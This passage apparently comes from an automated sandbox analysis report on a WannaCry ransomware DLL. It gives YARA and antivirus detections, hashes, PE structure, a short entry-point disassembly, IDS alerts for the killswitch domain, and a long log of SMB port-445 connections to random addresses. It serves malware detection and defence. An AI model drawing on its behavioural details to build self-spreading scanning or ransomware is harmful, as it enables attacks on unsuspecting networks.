                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                                                        • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.412630716402947
                                                        TrID:
                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                        • DOS Executable Generic (2002/1) 0.20%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:mbXvGlj2dR.dll
                                                        File size:5267459
                                                        MD5:ae12bb54af31227017feffd9598a6f5e
                                                        SHA1:f597a1cc16d42b7f02e077696e067cd3030a06d9
                                                        SHA256:c05e2dab77349cd639aa837e7e121710b8a0718d8fc93fb4cc6458ae90e5c597
                                                        SHA512:a80b1cc70cafff3b8edb2e732fa2360436cc7556ba91977ab1fa505ad7c6e184c465839d1584f827be17ccb751240432348debe69eed4e006321d9af4334621b
                                                        SSDEEP:98304:+DqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2H:+DqPe1Cxcxk3ZAEUadzR8yc4H
                                                        TLSH:92363394622CB2FCF0440EB44463896BB7B33C6967BA5E1F8BC086670D43B5BAFD0641
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.r_9...9...9.......=...9...6.....A.:.......8.......8.......:...Rich9...........................PE..L...QW.Y...........!.......
                                                        Icon Hash:74f0e4ecccdce0e4
                                                        Entrypoint:0x100011e9
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x10000000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                        DLL Characteristics:
                                                        Time Stamp:0x59145751 [Thu May 11 12:21:37 2017 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:2e5708ae5fed0403e8117c645fb23e5b
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        push ebx
                                                        mov ebx, dword ptr [ebp+08h]
                                                        push esi
                                                        mov esi, dword ptr [ebp+0Ch]
                                                        push edi
                                                        mov edi, dword ptr [ebp+10h]
                                                        test esi, esi
                                                        jne 00007F1EDC6B9ACBh
                                                        cmp dword ptr [10003140h], 00000000h
                                                        jmp 00007F1EDC6B9AE8h
                                                        cmp esi, 01h
                                                        je 00007F1EDC6B9AC7h
                                                        cmp esi, 02h
                                                        jne 00007F1EDC6B9AE4h
                                                        mov eax, dword ptr [10003150h]
                                                        test eax, eax
                                                        je 00007F1EDC6B9ACBh
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call eax
                                                        test eax, eax
                                                        je 00007F1EDC6B9ACEh
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call 00007F1EDC6B99DAh
                                                        test eax, eax
                                                        jne 00007F1EDC6B9AC6h
                                                        xor eax, eax
                                                        jmp 00007F1EDC6B9B10h
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call 00007F1EDC6B988Ch
                                                        cmp esi, 01h
                                                        mov dword ptr [ebp+0Ch], eax
                                                        jne 00007F1EDC6B9ACEh
                                                        test eax, eax
                                                        jne 00007F1EDC6B9AF9h
                                                        push edi
                                                        push eax
                                                        push ebx
                                                        call 00007F1EDC6B99B6h
                                                        test esi, esi
                                                        je 00007F1EDC6B9AC7h
                                                        cmp esi, 03h
                                                        jne 00007F1EDC6B9AE8h
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call 00007F1EDC6B99A5h
                                                        test eax, eax
                                                        jne 00007F1EDC6B9AC5h
                                                        and dword ptr [ebp+0Ch], eax
                                                        cmp dword ptr [ebp+0Ch], 00000000h
                                                        je 00007F1EDC6B9AD3h
                                                        mov eax, dword ptr [10003150h]
                                                        test eax, eax
                                                        je 00007F1EDC6B9ACAh
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call eax
                                                        mov dword ptr [ebp+0Ch], eax
                                                        mov eax, dword ptr [ebp+0Ch]
                                                        pop edi
                                                        pop esi
                                                        pop ebx
                                                        pop ebp
                                                        retn 000Ch
                                                        jmp dword ptr [10002028h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        Programming Language:
                                                        • [ C ] VS98 (6.0) build 8168
                                                        • [C++] VS98 (6.0) build 8168
                                                        • [RES] VS98 (6.0) cvtres build 1720
                                                        • [LNK] VS98 (6.0) imp/exp build 8168
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x21900x48.rdata
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x203c0x3c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x500060.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5050000x5c.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x3c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x28c0x1000False0.13037109375data1.4429971244731552IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x20000x1d80x1000False0.072509765625data0.7346018133622799IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x30000x1540x1000False0.016845703125Matlab v4 mat-file (little endian) C:\%s\%s, numeric, rows 0, columns 00.085238686413312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x40000x5000600x501000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x5050000x2ac0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountry
                                                        W0x40600x500000dataEnglishUnited States
                                                        DLLImport
                                                        KERNEL32.dllCloseHandle, WriteFile, CreateFileA, SizeofResource, LockResource, LoadResource, FindResourceA, CreateProcessA
                                                        MSVCRT.dllfree, _initterm, malloc, _adjust_fdiv, sprintf
                                                        NameOrdinalAddress
                                                        PlayGame10x10001114
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        192.168.2.5104.16.173.8049705802024298 12/22/22-10:04:12.821735TCP2024298ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 14970580192.168.2.5104.16.173.80
                                                        104.16.173.80192.168.2.580497052031515 12/22/22-10:04:12.892621TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049705104.16.173.80192.168.2.5
                                                        192.168.2.58.8.8.849177532024291 12/22/22-10:04:11.399493UDP2024291ET TROJAN Possible WannaCry DNS Lookup 14917753192.168.2.58.8.8.8
                                                        192.168.2.58.8.8.861452532024291 12/22/22-10:04:14.774772UDP2024291ET TROJAN Possible WannaCry DNS Lookup 16145253192.168.2.58.8.8.8
                                                        104.16.173.80192.168.2.580497042031515 12/22/22-10:04:11.530386TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049704104.16.173.80192.168.2.5
                                                        192.168.2.58.8.8.849724532024291 12/22/22-10:04:12.766078UDP2024291ET TROJAN Possible WannaCry DNS Lookup 14972453192.168.2.58.8.8.8
                                                        192.168.2.5104.16.173.8049704802024298 12/22/22-10:04:11.489060TCP2024298ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 14970480192.168.2.5104.16.173.80
                                                        192.168.2.5104.17.244.8149729802024298 12/22/22-10:04:14.861584TCP2024298ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 14972980192.168.2.5104.17.244.81
                                                        104.17.244.81192.168.2.580497292031515 12/22/22-10:04:14.898456TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049729104.17.244.81192.168.2.5
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 22, 2022 10:04:02.684921026 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.685123920 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.685167074 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.685209036 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.685247898 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.685275078 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.685275078 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.685317039 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.685317039 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.685381889 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.702356100 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702394962 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702425003 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702452898 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702471018 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702488899 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702500105 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702517033 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702534914 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702552080 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702630043 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702708006 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702727079 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702773094 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702790976 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702806950 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702824116 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702840090 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702869892 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702898026 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702915907 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.702941895 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703036070 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703053951 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703104973 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703161955 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703264952 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703385115 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703505039 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703543901 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703594923 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703612089 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703857899 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703895092 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703937054 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.703953981 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704065084 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704154015 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704185009 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704215050 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704236031 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.704255104 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704265118 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:02.704272032 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704293966 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704310894 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704406977 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704426050 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704478979 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704534054 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704551935 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704623938 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704698086 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704751015 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.704793930 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.749221087 CET44349702204.79.197.200192.168.2.5
                                                        Dec 22, 2022 10:04:02.749414921 CET49702443192.168.2.5204.79.197.200
                                                        Dec 22, 2022 10:04:11.469918013 CET4970480192.168.2.5104.16.173.80
                                                        Dec 22, 2022 10:04:11.487921000 CET8049704104.16.173.80192.168.2.5
                                                        Dec 22, 2022 10:04:11.488058090 CET4970480192.168.2.5104.16.173.80
                                                        Dec 22, 2022 10:04:11.489059925 CET4970480192.168.2.5104.16.173.80
                                                        Dec 22, 2022 10:04:11.506388903 CET8049704104.16.173.80192.168.2.5
                                                        Dec 22, 2022 10:04:11.530385971 CET8049704104.16.173.80192.168.2.5
                                                        Dec 22, 2022 10:04:11.530435085 CET8049704104.16.173.80192.168.2.5
                                                        Dec 22, 2022 10:04:11.533675909 CET4970480192.168.2.5104.16.173.80
                                                        Dec 22, 2022 10:04:11.541896105 CET4970480192.168.2.5104.16.173.80
                                                        Dec 22, 2022 10:04:11.559308052 CET8049704104.16.173.80192.168.2.5
                                                        Dec 22, 2022 10:04:12.801708937 CET4970580192.168.2.5104.16.173.80
                                                        Dec 22, 2022 10:04:12.819174051 CET8049705104.16.173.80192.168.2.5
                                                        Dec 22, 2022 10:04:12.819317102 CET4970580192.168.2.5104.16.173.80
                                                        Dec 22, 2022 10:04:12.821734905 CET4970580192.168.2.5104.16.173.80
                                                        Dec 22, 2022 10:04:12.839112043 CET8049705104.16.173.80192.168.2.5
                                                        Dec 22, 2022 10:04:12.892621040 CET8049705104.16.173.80192.168.2.5
                                                        Dec 22, 2022 10:04:12.892956018 CET4970580192.168.2.5104.16.173.80
                                                        Dec 22, 2022 10:04:12.892956018 CET4970580192.168.2.5104.16.173.80
                                                        Dec 22, 2022 10:04:12.910480976 CET8049705104.16.173.80192.168.2.5
                                                        Dec 22, 2022 10:04:12.976639986 CET49706445192.168.2.5200.21.227.70
                                                        Dec 22, 2022 10:04:13.111320972 CET8049705104.16.173.80192.168.2.5
                                                        Dec 22, 2022 10:04:13.111397982 CET4970580192.168.2.5104.16.173.80
                                                        Dec 22, 2022 10:04:14.100306988 CET49720445192.168.2.5212.44.196.231
                                                        Dec 22, 2022 10:04:14.843183994 CET4972980192.168.2.5104.17.244.81
                                                        Dec 22, 2022 10:04:14.860759020 CET8049729104.17.244.81192.168.2.5
                                                        Dec 22, 2022 10:04:14.860913038 CET4972980192.168.2.5104.17.244.81
                                                        Dec 22, 2022 10:04:14.861583948 CET4972980192.168.2.5104.17.244.81
                                                        Dec 22, 2022 10:04:14.878943920 CET8049729104.17.244.81192.168.2.5
                                                        Dec 22, 2022 10:04:14.898456097 CET8049729104.17.244.81192.168.2.5
                                                        Dec 22, 2022 10:04:14.898504019 CET8049729104.17.244.81192.168.2.5
                                                        Dec 22, 2022 10:04:14.898662090 CET4972980192.168.2.5104.17.244.81
                                                        Dec 22, 2022 10:04:14.898662090 CET4972980192.168.2.5104.17.244.81
                                                        Dec 22, 2022 10:04:14.906214952 CET4972980192.168.2.5104.17.244.81
                                                        Dec 22, 2022 10:04:14.923723936 CET8049729104.17.244.81192.168.2.5
                                                        Dec 22, 2022 10:04:14.963985920 CET49731445192.168.2.5160.90.130.250
                                                        Dec 22, 2022 10:04:15.209784031 CET49733445192.168.2.585.142.2.233
                                                        Dec 22, 2022 10:04:16.068633080 CET49742445192.168.2.583.174.153.32
                                                        Dec 22, 2022 10:04:16.318964958 CET49746445192.168.2.5103.162.110.84
                                                        Dec 22, 2022 10:04:16.984427929 CET49757445192.168.2.59.10.149.212
                                                        Dec 22, 2022 10:04:17.181582928 CET49758445192.168.2.5156.87.122.211
                                                        Dec 22, 2022 10:04:17.428301096 CET49761445192.168.2.5113.0.164.218
                                                        Dec 22, 2022 10:04:18.084994078 CET49771445192.168.2.540.228.2.212
                                                        Dec 22, 2022 10:04:18.287650108 CET49773445192.168.2.5207.148.171.202
                                                        Dec 22, 2022 10:04:18.560482979 CET49777445192.168.2.556.36.246.18
                                                        Dec 22, 2022 10:04:18.995642900 CET49785445192.168.2.598.52.20.72
                                                        Dec 22, 2022 10:04:19.194384098 CET49786445192.168.2.5192.254.148.131
                                                        Dec 22, 2022 10:04:19.413062096 CET49789445192.168.2.591.252.232.99
                                                        Dec 22, 2022 10:04:19.694277048 CET49793445192.168.2.563.49.180.232
                                                        Dec 22, 2022 10:04:20.204025984 CET49797445192.168.2.545.33.91.132
                                                        Dec 22, 2022 10:04:20.319905996 CET49799445192.168.2.5134.162.123.20
                                                        Dec 22, 2022 10:04:20.553447962 CET49802445192.168.2.566.45.115.36
                                                        Dec 22, 2022 10:04:21.409542084 CET49807445192.168.2.5150.48.163.125
                                                        Dec 22, 2022 10:04:21.603250980 CET49809445192.168.2.568.39.48.208
                                                        Dec 22, 2022 10:04:21.603295088 CET49810445192.168.2.539.168.35.151
                                                        Dec 22, 2022 10:04:21.605267048 CET49811445192.168.2.593.50.247.138
                                                        Dec 22, 2022 10:04:21.722110987 CET49813445192.168.2.5214.55.37.32
                                                        Dec 22, 2022 10:04:23.674015045 CET49819445192.168.2.542.45.174.121
                                                        Dec 22, 2022 10:04:23.743141890 CET49820445192.168.2.55.150.178.155
                                                        Dec 22, 2022 10:04:23.743777037 CET49821445192.168.2.5190.221.196.201
                                                        Dec 22, 2022 10:04:23.744569063 CET49822445192.168.2.5204.157.223.161
                                                        Dec 22, 2022 10:04:23.745174885 CET49823445192.168.2.5111.53.16.33
                                                        Dec 22, 2022 10:04:23.746000051 CET49824445192.168.2.5148.253.43.220
                                                        Dec 22, 2022 10:04:23.953107119 CET44549824148.253.43.220192.168.2.5
                                                        Dec 22, 2022 10:04:24.568598032 CET49824445192.168.2.5148.253.43.220
                                                        Dec 22, 2022 10:04:24.775470972 CET44549824148.253.43.220192.168.2.5
                                                        Dec 22, 2022 10:04:24.788120031 CET49835445192.168.2.5202.147.41.118
                                                        Dec 22, 2022 10:04:24.851525068 CET49837445192.168.2.5142.243.186.244
                                                        Dec 22, 2022 10:04:24.852289915 CET49838445192.168.2.589.62.93.203
                                                        Dec 22, 2022 10:04:24.853291035 CET49839445192.168.2.5176.157.230.78
                                                        Dec 22, 2022 10:04:24.854340076 CET49840445192.168.2.5205.206.220.69
                                                        Dec 22, 2022 10:04:24.854950905 CET49841445192.168.2.548.144.79.129
                                                        Dec 22, 2022 10:04:25.665654898 CET49848445192.168.2.530.123.236.167
                                                        Dec 22, 2022 10:04:25.913140059 CET49853445192.168.2.5222.244.6.150
                                                        Dec 22, 2022 10:04:25.982264042 CET49855445192.168.2.516.196.224.197
                                                        Dec 22, 2022 10:04:25.982745886 CET49856445192.168.2.5199.59.56.211
                                                        Dec 22, 2022 10:04:25.983863115 CET49857445192.168.2.572.149.34.46
                                                        Dec 22, 2022 10:04:25.984659910 CET49858445192.168.2.564.46.90.80
                                                        Dec 22, 2022 10:04:25.984805107 CET49859445192.168.2.516.52.32.115
                                                        Dec 22, 2022 10:04:26.774107933 CET49866445192.168.2.573.182.207.245
                                                        Dec 22, 2022 10:04:27.023622990 CET49870445192.168.2.5208.250.77.132
                                                        Dec 22, 2022 10:04:27.086450100 CET49872445192.168.2.5145.169.105.83
                                                        Dec 22, 2022 10:04:27.086833000 CET49874445192.168.2.511.106.154.215
                                                        Dec 22, 2022 10:04:27.086921930 CET49876445192.168.2.5159.155.249.111
                                                        Dec 22, 2022 10:04:27.086924076 CET49875445192.168.2.510.129.71.71
                                                        Dec 22, 2022 10:04:27.086997032 CET49873445192.168.2.5147.181.52.222
                                                        Dec 22, 2022 10:04:27.680634022 CET49882445192.168.2.575.159.6.130
                                                        Dec 22, 2022 10:04:27.902328968 CET49886445192.168.2.5110.58.225.176
                                                        Dec 22, 2022 10:04:28.132576942 CET49891445192.168.2.571.184.160.181
                                                        Dec 22, 2022 10:04:28.231424093 CET49893445192.168.2.598.187.121.115
                                                        Dec 22, 2022 10:04:28.232470036 CET49894445192.168.2.5197.229.187.23
                                                        Dec 22, 2022 10:04:28.233560085 CET49895445192.168.2.5219.192.164.69
                                                        Dec 22, 2022 10:04:28.234855890 CET49896445192.168.2.550.193.26.198
                                                        Dec 22, 2022 10:04:28.234885931 CET49897445192.168.2.59.36.116.34
                                                        Dec 22, 2022 10:04:28.790028095 CET49902445192.168.2.5203.201.242.88
                                                        Dec 22, 2022 10:04:29.007411003 CET49906445192.168.2.513.227.25.19
                                                        Dec 22, 2022 10:04:29.258187056 CET49911445192.168.2.572.61.1.183
                                                        Dec 22, 2022 10:04:29.351340055 CET49913445192.168.2.5103.198.140.173
                                                        Dec 22, 2022 10:04:29.352092028 CET49914445192.168.2.56.120.149.35
                                                        Dec 22, 2022 10:04:29.352817059 CET49915445192.168.2.5192.218.195.51
                                                        Dec 22, 2022 10:04:29.353348017 CET49916445192.168.2.513.199.234.126
                                                        Dec 22, 2022 10:04:29.354005098 CET49917445192.168.2.5186.15.82.104
                                                        Dec 22, 2022 10:04:29.696855068 CET49919445192.168.2.5188.151.79.232
                                                        Dec 22, 2022 10:04:29.897785902 CET49923445192.168.2.5212.54.236.109
                                                        Dec 22, 2022 10:04:30.117623091 CET49927445192.168.2.51.220.229.40
                                                        Dec 22, 2022 10:04:30.383012056 CET49932445192.168.2.5155.107.173.66
                                                        Dec 22, 2022 10:04:30.485260010 CET49933445192.168.2.5217.197.141.232
                                                        Dec 22, 2022 10:04:30.485961914 CET49934445192.168.2.5213.14.17.88
                                                        Dec 22, 2022 10:04:30.486535072 CET49935445192.168.2.515.3.6.167
                                                        Dec 22, 2022 10:04:30.487190962 CET49936445192.168.2.516.218.149.11
                                                        Dec 22, 2022 10:04:30.488337040 CET49937445192.168.2.591.52.180.166
                                                        Dec 22, 2022 10:04:30.820630074 CET49939445192.168.2.59.202.166.193
                                                        Dec 22, 2022 10:04:31.007436991 CET49943445192.168.2.59.210.15.40
                                                        Dec 22, 2022 10:04:31.257503986 CET49948445192.168.2.5153.167.249.160
                                                        Dec 22, 2022 10:04:31.508498907 CET49952445192.168.2.579.173.75.155
                                                        Dec 22, 2022 10:04:31.602149963 CET49954445192.168.2.5184.141.78.6
                                                        Dec 22, 2022 10:04:31.602169991 CET49953445192.168.2.5176.232.117.166
                                                        Dec 22, 2022 10:04:31.602242947 CET49955445192.168.2.537.207.163.134
                                                        Dec 22, 2022 10:04:31.602437019 CET49957445192.168.2.5119.186.164.72
                                                        Dec 22, 2022 10:04:31.602456093 CET49956445192.168.2.5151.150.107.242
                                                        Dec 22, 2022 10:04:31.712393045 CET49958445192.168.2.599.57.209.75
                                                        Dec 22, 2022 10:04:31.930274963 CET49961445192.168.2.510.15.117.253
                                                        Dec 22, 2022 10:04:32.117688894 CET49965445192.168.2.5128.78.136.243
                                                        Dec 22, 2022 10:04:32.367043972 CET49970445192.168.2.5216.109.16.61
                                                        Dec 22, 2022 10:04:32.618372917 CET49973445192.168.2.531.100.12.2
                                                        Dec 22, 2022 10:04:32.712697029 CET49974445192.168.2.588.238.181.166
                                                        Dec 22, 2022 10:04:32.715647936 CET49975445192.168.2.565.4.60.229
                                                        Dec 22, 2022 10:04:32.716176987 CET49976445192.168.2.5135.241.20.83
                                                        Dec 22, 2022 10:04:32.716662884 CET49977445192.168.2.535.143.222.246
                                                        Dec 22, 2022 10:04:32.716665983 CET49978445192.168.2.5206.163.14.155
                                                        Dec 22, 2022 10:04:32.820348024 CET49980445192.168.2.5170.18.183.27
                                                        Dec 22, 2022 10:04:33.054280996 CET49983445192.168.2.5223.40.5.236
                                                        Dec 22, 2022 10:04:33.241724968 CET49987445192.168.2.5101.233.49.170
                                                        Dec 22, 2022 10:04:33.477056980 CET49991445192.168.2.5180.191.114.64
                                                        Dec 22, 2022 10:04:33.727094889 CET49994445192.168.2.5180.134.55.227
                                                        Dec 22, 2022 10:04:33.742038012 CET49995445192.168.2.544.37.239.52
                                                        Dec 22, 2022 10:04:33.837853909 CET49997445192.168.2.5210.207.194.194
                                                        Dec 22, 2022 10:04:33.837908983 CET49998445192.168.2.538.199.240.131
                                                        Dec 22, 2022 10:04:33.837980032 CET49999445192.168.2.5140.166.32.216
                                                        Dec 22, 2022 10:04:33.837994099 CET50000445192.168.2.581.59.43.240
                                                        Dec 22, 2022 10:04:33.838144064 CET50001445192.168.2.5173.142.230.126
                                                        Dec 22, 2022 10:04:33.947639942 CET50002445192.168.2.583.55.51.87
                                                        Dec 22, 2022 10:04:34.163889885 CET50006445192.168.2.564.106.37.23
                                                        Dec 22, 2022 10:04:34.372797966 CET50008445192.168.2.5125.1.128.112
                                                        Dec 22, 2022 10:04:34.605303049 CET50013445192.168.2.5222.102.156.48
                                                        Dec 22, 2022 10:04:34.836076975 CET50016445192.168.2.5143.40.195.18
                                                        Dec 22, 2022 10:04:34.867569923 CET50018445192.168.2.518.132.137.251
                                                        Dec 22, 2022 10:04:34.946629047 CET50019445192.168.2.571.2.110.84
                                                        Dec 22, 2022 10:04:34.948076010 CET50020445192.168.2.5167.40.222.39
                                                        Dec 22, 2022 10:04:34.949223042 CET50021445192.168.2.5209.201.109.235
                                                        Dec 22, 2022 10:04:34.950433016 CET50022445192.168.2.5158.193.88.206
                                                        Dec 22, 2022 10:04:34.951611996 CET50023445192.168.2.5211.22.122.229
                                                        Dec 22, 2022 10:04:35.054974079 CET50025445192.168.2.562.193.122.91
                                                        Dec 22, 2022 10:04:35.273087025 CET50028445192.168.2.532.224.251.48
                                                        Dec 22, 2022 10:04:35.491775036 CET50032445192.168.2.5155.83.43.249
                                                        Dec 22, 2022 10:04:35.727442980 CET50037445192.168.2.5136.44.248.234
                                                        Dec 22, 2022 10:04:35.744226933 CET50038445192.168.2.544.130.190.7
